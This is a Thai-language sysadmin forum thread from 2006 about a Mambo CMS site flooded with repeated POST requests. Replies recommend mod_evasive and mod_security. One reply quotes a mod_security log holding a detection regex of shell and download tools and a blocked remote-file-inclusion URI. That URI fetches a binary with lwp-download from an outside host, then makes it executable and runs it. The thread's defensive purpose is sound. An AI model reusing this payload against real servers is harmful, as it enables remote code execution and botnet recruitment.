แบบนี้ เรียกว่า คนทำ กำลังทำอะไรหรือครับ หวัง

วันนี้ server ทำงานหนัก ผิด ปกติ เลยไล่ดู ก็เห็น httpd จาก top
จกา RSS ก้อนละ 11-13 Mb ก็เลยไล่ ดู httpd แต่ละเวปก็เจอ เวปนึง ใช้ cms
มี ipนึง ขนาดเปลี่ยน httpdocs เป็น httpdocs2 ให้เค้าเวปไม่ได้แต่ log ก็ยังขึ้นตลอด
ตามด้านล่าง ไม่รู้ว่าคนทำต้องการอะไร และมันคืออะไรหรือครับ ใครเคยเจอบ้าง

58.136.74.240 - - [08/Jun/2006:17:41:32 +0700] “POST /index.php?option=&Itemid=&whoisonline=refresh HTTP/1.1” 404 - “http://www.domain.com/” "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); .NET CLR 1.1.4322)"
58.136.74.240 - - [08/Jun/2006:17:41:32 +0700] “POST /index.php?option=&Itemid=&whoisonline=refresh HTTP/1.1” 404 - “http://www.domain.com/” "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); .NET CLR 1.1.4322)"
58.136.74.240 - - [08/Jun/2006:17:41:32 +0700] “POST /index.php?option=&Itemid=&whoisonline=refresh HTTP/1.1” 404 - “http://www.domain.com/” "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); .NET CLR 1.1.4322)"
58.136.74.240 - - [08/Jun/2006:17:41:32 +0700] “POST /index.php?option=&Itemid=&whoisonline=refresh HTTP/1.1” 404 - “http://www.domain.com/” "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); .NET CLR 1.1.4322)"
58.136.74.240 - - [08/Jun/2006:17:41:32 +0700] “POST /index.php?option=&Itemid=&whoisonline=refresh HTTP/1.1” 404 - “http://www.domain.com/” "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); .NET CLR 1.1.4322)"
58.136.74.240 - - [08/Jun/2006:17:41:32 +0700] “POST /index.php?option=&Itemid=&whoisonline=refresh HTTP/1.1” 404 - “http://www.domain.com/” "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); .NET CLR 1.1.4322)"
58.136.74.240 - - [08/Jun/2006:17:41:32 +0700] “POST /index.php?option=&Itemid=&whoisonline=refresh HTTP/1.1” 404 - “http://www.domain.com/” "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); .NET CLR 1.1.4322)"
58.136.74.240 - - [08/Jun/2006:17:41:32 +0700] “POST /index.php?option=&Itemid=&whoisonline=refresh HTTP/1.1” 404 - “http://www.domain.com/” "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); .NET CLR 1.1.4322)"
58.136.74.240 - - [08/Jun/2006:17:41:33 +0700] “POST /index.php?option=&Itemid=&whoisonline=refresh HTTP/1.1” 404 - “http://www.domain.com/” "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); .NET CLR 1.1.4322)"
58.136.74.240 - - [08/Jun/2006:17:41:33 +0700] “POST /index.php?option=&Itemid=&whoisonline=refresh HTTP/1.1” 404 - “http://www.domain.com/” "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); .NET CLR 1.1.4322)"
58.136.74.240 - - [08/Jun/2006:17:41:33 +0700] “POST /index.php?option=&Itemid=&whoisonline=refresh HTTP/1.1” 404 - “http://www.domain.com/” "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); .NET CLR 1.1.4322)"
58.136.74.240 - - [08/Jun/2006:17:41:33 +0700] “POST /index.php?option=&Itemid=&whoisonline=refresh HTTP/1.1” 404 - “http://www.domain.com/” "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); .NET CLR 1.1.4322)"
58.136.74.240 - - [08/Jun/2006:17:41:33 +0700] “POST /index.php?option=&Itemid=&whoisonline=refresh HTTP/1.1” 404 - “http://www.domain.com/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); .NET CLR 1.1.4322)”

คงเป็นการพยายาม DDoS น่ะครับ ดูจากเวลาแล้ว access วิเดียวเป็นสิบครั้งเนี่ย

mod_evasive ช่วยท่านได้

คำสั่งจาก top นะครับ RSS เยอะ ขนาดนี้ ปกติไหมครับ แล้วมันคืออะไรหรือครับ
ตอนนี้ ใช้ firewall block ip ทิ้งไปแล้ว แบบนี้ มันมีทางแก้ ที่ดีกว่านี้ไหมครับ

ใช้ mambo cms

/index.php?option=&Itemid=&whoisonline=refresh

งึมๆ
ลง mod_evasive ให้ apache ดูสิครับ

ผมก็มีครับ เจอแบบนี้…

[Mon Jun 12 01:39:25 2006] [error] [client 196.28.56.170] mod_security: Access denied with code 500. Pattern match “(\\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|cat|pagina|path|include_location|root|page|gorumDir|site|topside|pun_root|open|seite)=(http|https|ftp)\\:/|(cmd|command)=(cd|\\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |lwp-(download|request|mirror|rget) |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\\+\\+ |\\./|whoami|killall |rm \\-[a-z|A-Z]))” at REQUEST_URI [severity “EMERGENCY”] [hostname “202.142.xxx.xxx”] [uri “/final/ubbt.inc.php?GLOBALS[thispath]=http://www.botzii.info/cmd.txt?&cmd=cd%20/tmp;lwp-download%20-a%20http://www.botzii.info/smack;chmod%20744%20smack;./smack%2062.168.183.151%208080;echo%20YYY;echo|”]

ยังงัยผมว่าติด Mod_security หน่อยก็ดีน่ะครับ